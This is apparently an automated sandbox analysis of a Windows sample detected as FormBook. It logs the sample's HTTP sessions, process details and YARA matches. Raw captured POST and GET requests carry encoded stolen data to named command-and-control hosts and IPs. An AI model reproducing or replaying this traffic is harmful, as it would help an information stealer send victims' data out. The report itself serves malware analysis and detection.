                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.washio.world
                                                  Origin: http://www.washio.world
                                                  Referer: http://www.washio.world/uox9/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=fmCKRcgKWJYkINuKpQIZRjNOsCXRKVwo8q9VN+yGbFSKU4o8BoywVoHM8/lFjjG+tpBztpas7LBIjAvXcI2wqKJEjPJJBrpGYgQcuj6FlXBPBretF3RUju/OPKHvNJuVB8baR2QOjuWfISYjPc0oPEQ3zvlvW8pKxqCo5cyjbe4l1JhdrdUuJQTLPAyWrUqVuw==
                                                  Jul 2, 2024 14:09:12.975966930 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 02 Jul 2024 12:09:12 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Content-Encoding: gzip
                                                  Jul 2, 2024 14:09:12.975986958 CEST | 224 | IN |
                                                  Jul 2, 2024 14:09:12.975997925 CEST | 1236 | IN |
                                                  Jul 2, 2024 14:09:12.976015091 CEST | 1121 | IN |


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  30 | 192.168.2.4 | 49767 | 194.58.112.174 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:14.813560009 CEST | 788 | OUT | POST /uox9/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.washio.world
                                                  Origin: http://www.washio.world
                                                  Referer: http://www.washio.world/uox9/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=fmCKRcgKWJYkJt+KlX8ZTDNNjiXRTFws8qhVN/3bOnmKUZY8T9SwSoHM0fl6tDG1tpcEtres7LVIjFLXc/C/raJCsvJPcbpGYgQcuna8lWpPCbutET9T8e/RY6HvGpuZB8b4R00ojsefITIjPN0rVUQxtfkORdwE46rkwsaAY9Em5vwH6s15bQ34SH7imXXc16wUCahRhKHrrQjqItReb+U=
                                                  Jul 2, 2024 14:09:15.533071041 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 02 Jul 2024 12:09:15 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Content-Encoding: gzip
                                                  Jul 2, 2024 14:09:15.533170938 CEST | 1236 | IN |
                                                  Jul 2, 2024 14:09:15.533178091 CEST | 1236 | IN |
                                                  Jul 2, 2024 14:09:15.533190966 CEST | 109 | IN |


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  31 | 192.168.2.4 | 49768 | 194.58.112.174 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:17.374269962 CEST | 10870 | OUT | POST /uox9/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.washio.world
                                                  Origin: http://www.washio.world
                                                  Referer: http://www.washio.world/uox9/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp= [TRUNCATED]
                                                  Jul 2, 2024 14:09:18.080084085 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 02 Jul 2024 12:09:17 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Content-Encoding: gzip
                                                  Jul 2, 2024 14:09:18.080104113 CEST | 1236 | IN |
                                                  Jul 2, 2024 14:09:18.080116987 CEST | 1236 | IN |
                                                  Jul 2, 2024 14:09:18.080132008 CEST | 109 | IN |


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  32 | 192.168.2.4 | 49769 | 194.58.112.174 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:19.910671949 CEST | 499 | OUT | GET /uox9/?wd98XJp=SkqqSrQ8SMo2XL3atDg5EwteixjEHmcOkKNOXL2YXVO5YY42DfvwbKSww9pKtEGGvKt0lrGjy49L8DH+d/eZjL5PtpdyGoJABAcliTTSnjNRJ5qgIg1UjKg=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.washio.world
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:09:20.628379107 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 02 Jul 2024 12:09:20 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Ascii: 293d<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.washio.world</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" [TRUNCATED]
                                                  Jul 2, 2024 14:09:20.628391027 CEST | 224 | IN |
                                                  Data Ascii: iv class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.washio.world</h1><p class="b-
                                                  Jul 2, 2024 14:09:20.628397942 CEST | 1236 | IN |
                                                  Data Ascii: parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_size_normal b-p
                                                  Jul 2, 2024 14:09:20.628413916 CEST | 1236 | IN |
                                                  Data Ascii: type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nbsp;</p></div><
                                                  Jul 2, 2024 14:09:20.628421068 CEST | 1236 | IN |
                                                  Data Ascii: u/hosting/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount">83&nbsp;<span class="char-roub
                                                  Jul 2, 2024 14:09:20.628539085 CEST | 1236 | IN |
                                                  Data Ascii: nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp; &nbsp;
                                                  Jul 2, 2024 14:09:20.628546000 CEST | 1236 | IN |
                                                  Data Ascii: s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b
                                                  Jul 2, 2024 14:09:20.628560066 CEST | 1236 | IN |
                                                  Data Ascii: SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function
                                                  Jul 2, 2024 14:09:20.628673077 CEST | 776 | IN |
                                                  Data Ascii: cument.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9])
                                                  Jul 2, 2024 14:09:20.628679991 CEST | 1068 | IN |
                                                  Data Ascii: spans[ i ].style.display = 'none'; } } }</script>... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-3380909-25"></script><script>windo


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  33 | 192.168.2.4 | 49770 | 35.186.221.100 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:35.084700108 CEST | 768 | OUT | POST /7c6d/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.6666111p.vip
                                                  Origin: http://www.6666111p.vip
                                                  Referer: http://www.6666111p.vip/7c6d/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=9+wAp7v35rzg29HbJK29wvi2U2MhbcCi4ccFETymDlKsWbhMimAEmHbG+7Gw0S9ZDyZgdseeE/s/95CJLUPyJcFuDnS249xFesbX4YfBhgK8GF5bVH7o+rRfN6w4tI5jADUSiAH7F5cQmLW2nGLAyTPFGqyd5vCRq6YyOer5u7EquaIPE4m9Yo/l6eg8p1Yf1Q==
                                                  Jul 2, 2024 14:09:35.738698959 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                  Server: nginx/1.20.2
                                                  Date: Tue, 02 Jul 2024 12:09:35 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 559
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Jul 2, 2024 14:09:35.744383097 CEST | 559 | IN |
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  34 | 192.168.2.4 | 49771 | 35.186.221.100 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:37.630925894 CEST | 788 | OUT | POST /7c6d/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.6666111p.vip
                                                  Origin: http://www.6666111p.vip
                                                  Referer: http://www.6666111p.vip/7c6d/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=9+wAp7v35rzg3efbPtK98fi3ZmMhAsCY4cQFESm2DXesR7RMwicEqnbGwbG15y9kDyVedsyeE/o/99OJLlPzbcFgY3SwltxFesbX4YL/hhu8H2xbVm7r9rRAFaw4745nADUkiBasF/YQmPa2nXKWljPHZ6zY6uzFk70/J+/KpKsXvcZVVJHqKobWnZpIk2lWudKz6nu0rMpG6GDdzHAHLDQ=
                                                  Jul 2, 2024 14:09:38.293370962 CEST | 735 | IN | HTTP/1.1 405 Method Not Allowed
                                                  Server: nginx/1.20.2
                                                  Date: Tue, 02 Jul 2024 12:09:38 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 559
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  35 | 192.168.2.4 | 49772 | 35.186.221.100 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:40.160938978 CEST | 10870 | OUT | POST /7c6d/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.6666111p.vip
                                                  Origin: http://www.6666111p.vip
                                                  Referer: http://www.6666111p.vip/7c6d/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp= [TRUNCATED]
                                                  Jul 2, 2024 14:09:40.828658104 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                  Server: nginx/1.20.2
                                                  Date: Tue, 02 Jul 2024 12:09:40 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 559
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Jul 2, 2024 14:09:40.832053900 CEST | 559 | IN | Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  36 | 192.168.2.4 | 49773 | 35.186.221.100 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:42.692312002 CEST | 499 | OUT | GET /7c6d/?wd98XJp=w8YgqO/Zj/36mufrJumMstPGQWcWOvmXve42clWXA0OufJxdz0t5qmDG9Y+qzl9OADQlddr1Os9brfaQNQSPZtNIRBmq9MUfYdPf/ru8jRm7NVZbS2vao50=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.6666111p.vip
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:09:43.345776081 CEST | 300 | IN | HTTP/1.1 200 OK
                                                  Server: nginx/1.20.2
                                                  Date: Tue, 02 Jul 2024 12:09:43 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 5161
                                                  Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                  Vary: Accept-Encoding
                                                  ETag: "65a4939c-1429"
                                                  Cache-Control: no-cache
                                                  Accept-Ranges: bytes
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Jul 2, 2024 14:09:43.349478006 CEST | 1236 | IN | Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                  Jul 2, 2024 14:09:43.349502087 CEST | 1236 | IN | Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                  Jul 2, 2024 14:09:43.349514008 CEST | 56 | IN | Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android
                                                  Jul 2, 2024 14:09:43.356182098 CEST | 1236 | IN | Data Ascii: "===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&
                                                  Jul 2, 2024 14:09:43.356199026 CEST | 224 | IN | Data Ascii: min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareag
                                                  Jul 2, 2024 14:09:43.356211901 CEST | 1173 | IN | Data Ascii: ency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=window.innerWidth/.75;document.querySelector("html").style.fontSize=fontSize+"px",document.title=location.hostname</script><link hr


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  37 | 192.168.2.4 | 49774 | 46.30.211.38 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:48.406343937 CEST | 762 | OUT | POST /s5jh/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.0araba.net
                                                  Origin: http://www.0araba.net
                                                  Referer: http://www.0araba.net/s5jh/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=4RKqpUZE3+LQcD0GIBija1qUTderlIgurltH4fYgHl8ougk+9sh682AtzUSQvHiG5lRvdSp5LrI8/0SR+hqN8LQ1hIbzIRTNOe5do2Q9EloivhsgEAT5jutAPeNxTe3m5SfH1YeVSDkh2CgdYRWsEVEqiIsvye7pjdPdJY6GOzUwQHMZhLdFFWvOu9or8dfpRQ==
                                                  Jul 2, 2024 14:09:49.039344072 CEST | 738 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Tue, 02 Jul 2024 12:09:48 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 564
                                                  Connection: close
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  38 | 192.168.2.4 | 49775 | 46.30.211.38 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:50.940359116 CEST | 782 | OUT | POST /s5jh/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.0araba.net
                                                  Origin: http://www.0araba.net
                                                  Referer: http://www.0araba.net/s5jh/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=4RKqpUZE3+LQdnIGb2OjbVqXc9ervogyrlpH4d1lHXoouBU+8th652AtrkSZhniP5lNndXR5LrM8/1iR+yCC9bQ3tobxGxTNOe5do1tgEhMivQcgFl/69etBG+NxZ+3i5Sfu1ZzCSGoh2DQdYAWvfFFvmItKxtSLqJWMX4qZJxknYhdDw68SXWL9z6hfxeigKdm2YJBd8laPacEk9+WhDkI=
                                                  Jul 2, 2024 14:09:51.598968983 CEST | 738 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Tue, 02 Jul 2024 12:09:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 564
                                                  Connection: close
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  39 | 192.168.2.4 | 49776 | 46.30.211.38 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:53.612956047 CEST | 10864 | OUT | POST /s5jh/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.0araba.net
                                                  Origin: http://www.0araba.net
                                                  Referer: http://www.0araba.net/s5jh/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp= [TRUNCATED]
                                                  Jul 2, 2024 14:09:54.261322975 CEST | 738 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Tue, 02 Jul 2024 12:09:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 564
                                                  Connection: close
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  40 | 192.168.2.4 | 49777 | 46.30.211.38 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:09:56.161942005 CEST | 497 | OUT | GET /s5jh/?wd98XJp=1TiKqhVN19vKBh0iYV68FE6kd9yptaYL0yZFpqoiJ2lM+QkJ7dUu1EsavkeNrTvMwGcxWHp0eakXjUqcr3ub0eMvg/6QMTuDK9dTv3I1AhU9igMWM3XHjus=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.0araba.net
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:09:56.790225029 CEST | 738 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Tue, 02 Jul 2024 12:09:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 564
                                                  Connection: close
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->



                                                  Target ID:0
                                                  Start time:08:05:54
                                                  Start date:02/07/2024
                                                  Path:C:\Users\user\Desktop\nJ8mJTmMf0.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\nJ8mJTmMf0.exe"
                                                  Imagebase:0x600000
                                                  File size:1'234'944 bytes
                                                  MD5 hash:DD560917FD1166F8F9A3CA565E1C3957
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:08:05:54
                                                  Start date:02/07/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\nJ8mJTmMf0.exe"
                                                  Imagebase:0x6c0000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
